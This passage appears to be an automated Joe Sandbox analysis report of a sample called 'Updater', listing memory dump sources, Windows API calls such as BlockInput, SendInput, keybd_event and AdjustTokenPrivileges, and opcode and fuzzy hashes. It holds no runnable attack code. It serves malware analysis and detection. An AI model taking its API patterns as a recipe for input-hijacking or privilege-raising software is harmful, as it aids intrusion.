                                                                                                  • API String ID: 48322524-0
                                                                                                  • Opcode ID: e00de09669481c67deea8c2d36aae70f092366d7d2f52e4fe8edc622eb6b5287
                                                                                                  • Instruction ID: d8bf4add8d18e4fd85ebb9527d3ef4477c123b1049de542cc8a8b432c9afd4cd
                                                                                                  • Opcode Fuzzy Hash: e00de09669481c67deea8c2d36aae70f092366d7d2f52e4fe8edc622eb6b5287
                                                                                                  • Instruction Fuzzy Hash: 71E0DF329256116BA7206738EC0D8EA775CAB06336F104705F936C20E0EBB8AD41879A
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,006F4BCA,00000003,00799500,0000000C,006F4D21,00000003,00000002,00000000,?,00702799,00000003), ref: 006F4C15
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,006F4BCA,00000003,00799500,0000000C,006F4D21,00000003,00000002,00000000,?,00702799,00000003), ref: 006F4C1C
                                                                                                  • ExitProcess.KERNEL32 ref: 006F4C2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 5743fc4761d8b22dc2ee1c65e262a23be1da2223c3e11f0be0a35510727542c9
                                                                                                  • Instruction ID: a1b2dfc6d50124f16728ccaa990ea94f170e39bdfac9da05c4d62334c513f640
                                                                                                  • Opcode Fuzzy Hash: 5743fc4761d8b22dc2ee1c65e262a23be1da2223c3e11f0be0a35510727542c9
                                                                                                  • Instruction Fuzzy Hash: 3BE0B631511248EFCF226F55DD09AA93F6AEB45346B049414FA068A631CFBADE42CA44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2c0b96ee7b06c7627652edda853dbcc41b50f2ddd0d20d250582382ad828a6bc
                                                                                                  • Instruction ID: 915cf0cc49c57a7a9065a7ebbad2d88e969944ddea321fd422f8ea4290052221
                                                                                                  • Opcode Fuzzy Hash: 2c0b96ee7b06c7627652edda853dbcc41b50f2ddd0d20d250582382ad828a6bc
                                                                                                  • Instruction Fuzzy Hash: A3020C71E0011D9BDF14CFA9C9906EDBBF2EF88324F15826AD919E7384D731A945CB90
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0074751A
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00747563
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 2295610775-0
                                                                                                  • Opcode ID: 925587d75bda5b11ee4b3c9f6e1011003b8f39d463463a76e5244ed3fab5ebbd
                                                                                                  • Instruction ID: 608580f9aefa66da01ff5430881c72b3263d813526a333b910f934e40f374414
                                                                                                  • Opcode Fuzzy Hash: 925587d75bda5b11ee4b3c9f6e1011003b8f39d463463a76e5244ed3fab5ebbd
                                                                                                  • Instruction Fuzzy Hash: 6211BE31A042109FC714DF29C884A15BBE1FF89324F14C299E4698F7A2C734ED05CB91
                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,014A7F55), ref: 014A7F17
                                                                                                  • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,014A7F55), ref: 014A7F30
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 562261c611849093eedebd59964d2424eea228d0a8e6cd96342c3f2799835d6a
                                                                                                  • Instruction ID: eec3c31b60c93b49ca06f7a7e7ed61ff9abede92e59830e7b079d12d8bf505fb
                                                                                                  • Opcode Fuzzy Hash: 562261c611849093eedebd59964d2424eea228d0a8e6cd96342c3f2799835d6a
                                                                                                  • Instruction Fuzzy Hash: E4F0F671E086096BEB10DEA2CC50D8DB3AFE7F8714F91C47AA114935A0EA7466008610
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,0075548F,?,?,00755FF9,?), ref: 007445A2
                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,0075548F,?,?,00755FF9,?), ref: 007445B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                  • String ID:
                                                                                                  • API String ID: 3479602957-0
                                                                                                  • Opcode ID: 1fa48f1016e87e41d686835a56d90a28ce2643a698891824c150d0b2d83a9c70
                                                                                                  • Instruction ID: 9f2b1564ebc448ec743301066cf191eb494be920eb8b9a1fb130b5b728f50647
                                                                                                  • Opcode Fuzzy Hash: 1fa48f1016e87e41d686835a56d90a28ce2643a698891824c150d0b2d83a9c70
                                                                                                  • Instruction Fuzzy Hash: E2F0A7717143186AD72056A69C4DFEB7A6EEF85761F000266F509D2281D9645C0586F1
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,014B6A3C,00000000,014B6B48), ref: 014A3FF0
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,?,014B6A3C,00000000,014B6B48), ref: 014A4015
                                                                                                    • Part of subcall function 014A3F69: FileTimeToLocalFileTime.KERNEL32(?), ref: 014A3F99
                                                                                                    • Part of subcall function 014A3F69: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 014A3FA8
                                                                                                    • Part of subcall function 014A4049: FindClose.KERNEL32(?,?,014A4013,00000000,?,?,?,?,014B6A3C,00000000,014B6B48), ref: 014A4055
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                                  • String ID:
                                                                                                  • API String ID: 976985129-0
                                                                                                  • Opcode ID: 85bab9cfd6657be81c477965d7c9920948d62e9ac6640ead121c592b0455e55b
                                                                                                  • Instruction ID: 0d651e99f19919c175e8c12beee9cdfd78334734820378f074465b4a85416fab
                                                                                                  • Opcode Fuzzy Hash: 85bab9cfd6657be81c477965d7c9920948d62e9ac6640ead121c592b0455e55b
                                                                                                  • Instruction Fuzzy Hash: 8CE06DB6B062218747146EBE588089F55989AB866138F027BF914DB365DAB4CC1223E0
                                                                                                  APIs
                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0073C0AF
                                                                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0073C0C2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InputSendkeybd_event
                                                                                                  • String ID:
                                                                                                  • API String ID: 3536248340-0
                                                                                                  • Opcode ID: bbf9a3662a9106bd4510d77dbfd247b7d8dbdaf6f3464fab385467abd2f801c3
                                                                                                  • Instruction ID: cafbc8c1270eef13f65227ea7b57e6c9bffeffa459a65e80b3cabd5dcee4c337
                                                                                                  • Opcode Fuzzy Hash: bbf9a3662a9106bd4510d77dbfd247b7d8dbdaf6f3464fab385467abd2f801c3
                                                                                                  • Instruction Fuzzy Hash: 7AF0A93180028DABEB158FA0C805BBE7BB0EF08305F00800AF951AA292C37986109F94
                                                                                                  APIs
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00732308), ref: 007321DE
                                                                                                  • CloseHandle.KERNEL32(?,?,00732308), ref: 007321F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 81990902-0
                                                                                                  • Opcode ID: 38a703b08bbf61b2b349dec30796a108af837c327e6689151a432e1b3f9718f8
                                                                                                  • Instruction ID: 41b4c00d34f00819a2480b94349cc774846e5c6866a4fb8d541062704629577e
                                                                                                  • Opcode Fuzzy Hash: 38a703b08bbf61b2b349dec30796a108af837c327e6689151a432e1b3f9718f8
                                                                                                  • Instruction Fuzzy Hash: A9E04F72114704EEF7252B11FC06E727BE9EB04310F14C82DF6A680472DBA26C90DB14
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00706594,00000000,?,00000008,?,?,0070FDAF,00000000), ref: 007067C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  • Opcode ID: e913a53572dee5cffa98924732ed9eaf9322efe24767a2c7e9487f4c9c73fa7c
                                                                                                  • Instruction ID: 7ac812558a09b62c1f85db85daec5ced531ab11112788630d680d54e56a60f33
                                                                                                  • Opcode Fuzzy Hash: e913a53572dee5cffa98924732ed9eaf9322efe24767a2c7e9487f4c9c73fa7c
                                                                                                  • Instruction Fuzzy Hash: EFB16E31510609DFD719CF28C4AAB647BE0FF05368F258658E89ACF2E1C33AD9A1CB40
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006F0CBD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 6b09415ab2b6d04489f9cdbfa2db8ec8a733a2534d154743e573febd4f6ecf75
                                                                                                  • Instruction ID: fc6ca87645e41b807528a9582aac3aae958df60c311975c8de06caad2f9d7378
                                                                                                  • Opcode Fuzzy Hash: 6b09415ab2b6d04489f9cdbfa2db8ec8a733a2534d154743e573febd4f6ecf75
                                                                                                  • Instruction Fuzzy Hash: C94181B2901209DFFB24CFA8D9856AABBF5FB48310F24C46AD515E7351D734AD41CB50
                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,014A235F), ref: 014A231F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 36b67fa708d9f32684fdd3d8236a311be938fd8b6b3d80a52da832c8cbf2a6ae
                                                                                                  • Instruction ID: d3482bccfec4d28b0694dcaebd737e64ddd28b281d57db2a6324cabce2086ffa
                                                                                                  • Opcode Fuzzy Hash: 36b67fa708d9f32684fdd3d8236a311be938fd8b6b3d80a52da832c8cbf2a6ae
                                                                                                  • Instruction Fuzzy Hash: A9F0C83090420AAFEB14DEE2DC41EEEF77AF7A5710F51897AA110931A4E7B42604C740
                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 014A6977
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 8c85d529f1f020f63ef7f35d006a93bef216e000dc5b01d4844948bf4808de50
                                                                                                  • Instruction ID: 7c77dd6bfa9b7984e0d8169a045b35ac0937517420e71c51d316ef8be76ff378
                                                                                                  • Opcode Fuzzy Hash: 8c85d529f1f020f63ef7f35d006a93bef216e000dc5b01d4844948bf4808de50
                                                                                                  • Instruction Fuzzy Hash: F7E09272B0021417D310A95D8C84AEA735CA778210F81466FB945C7364EDB0AD4046A8
                                                                                                  APIs
                                                                                                  • BlockInput.USER32(00000001), ref: 0074F622
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlockInput
                                                                                                  • String ID:
                                                                                                  • API String ID: 3456056419-0
                                                                                                  • Opcode ID: c8ae52bf5caf27fc8c69434ad98104b3292dfd195871796f6e21260a2e800b54
                                                                                                  • Instruction ID: 999a67a9d6c515012b5c737df28725819943b55d7fd29862d583067a286a0dad
                                                                                                  • Opcode Fuzzy Hash: c8ae52bf5caf27fc8c69434ad98104b3292dfd195871796f6e21260a2e800b54
                                                                                                  • Instruction Fuzzy Hash: CBE012312002146FD710AF59D804A5AF7DDEF58760F01C42AF849C7351DBB5ED408B96
                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,014A8207,00000000,014A8420,?,?,00000000,00000000), ref: 014A69B8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: f1ffb4599b79f38fd8d7c650d754adac4e120045415bebdd127c198695e5f0c1
                                                                                                  • Instruction ID: 0af9ef305a4c29a99ecd7c11f3246436c5c38ed55dbbc00a95f02c0a1072841f
                                                                                                  • Opcode Fuzzy Hash: f1ffb4599b79f38fd8d7c650d754adac4e120045415bebdd127c198695e5f0c1
                                                                                                  • Instruction Fuzzy Hash: 2FD05EA630D2502EA310515E2E84DBB4E9CCAEA6A0F46443AF588C6220E2208C0A9371
                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00020FAB,006F0A05), ref: 006F0FA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: 391081be5f21dc395fa36b653c247cf88138ccc0f98f87c0442ee3264ec92dcc
                                                                                                  • Instruction ID: a0f9542a762ef01bb9aaea4c5a26bf78ab5d849810fd23ab25d70dc2486f6658
                                                                                                  • Opcode Fuzzy Hash: 391081be5f21dc395fa36b653c247cf88138ccc0f98f87c0442ee3264ec92dcc
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 574bdc200f174d829f8b8715b62e868504054d27e418bf8faf1f6e37d973240f
                                                                                                  • Instruction ID: 9e75aeb1de5076482a967eeae48a226a4cd303086d010602f594cd75abf593d4
                                                                                                  • Opcode Fuzzy Hash: 574bdc200f174d829f8b8715b62e868504054d27e418bf8faf1f6e37d973240f
                                                                                                  • Instruction Fuzzy Hash: F9629FB1E00619DBDF04DF64D881AAEB7B6FF44310F14816AE8169F392EB35DA45CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ac8c17bd3226f09dc8101093fe3f527ae2eee0e4159cac78e5b9704f76859e06
                                                                                                  • Instruction ID: edac9cfbe6b99f5ded0dba4ac7e173650b80198e101e2f3705cc8819d5bd385d
                                                                                                  • Opcode Fuzzy Hash: ac8c17bd3226f09dc8101093fe3f527ae2eee0e4159cac78e5b9704f76859e06
                                                                                                  • Instruction Fuzzy Hash: FD323421D29F418DE7279634D862335A688AFB33C4F15C727E81AB5AE6EF2CD5C39101
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aa730246038e1b0dc8b6e0cb5e7056155824c875f9eca6ddd35638d67734bef0
                                                                                                  • Instruction ID: 3375592b44de5076b8837eee7bd3852527bcb78da4d538fc5111f651fbdea9f3
                                                                                                  • Opcode Fuzzy Hash: aa730246038e1b0dc8b6e0cb5e7056155824c875f9eca6ddd35638d67734bef0
                                                                                                  • Instruction Fuzzy Hash: 4132F931A002A9CBDF24CF69E4D46BE77B2EB45314F29857AE455CB292D238DD82CB41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c213b6ff6d8fb814dd2c878fce4a21ba68a218fcd3a2247de5a5bcfc7499af83
                                                                                                  • Instruction ID: 0df35a9980709a7bb5db96d414ec78c551ea6ea884a8cca53b609121ecb10a83
                                                                                                  • Opcode Fuzzy Hash: c213b6ff6d8fb814dd2c878fce4a21ba68a218fcd3a2247de5a5bcfc7499af83
                                                                                                  • Instruction Fuzzy Hash: A542B071A08340DFD714DF28C891BAAB7E6BF84304F14491EF58A87392DB75E945CB92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
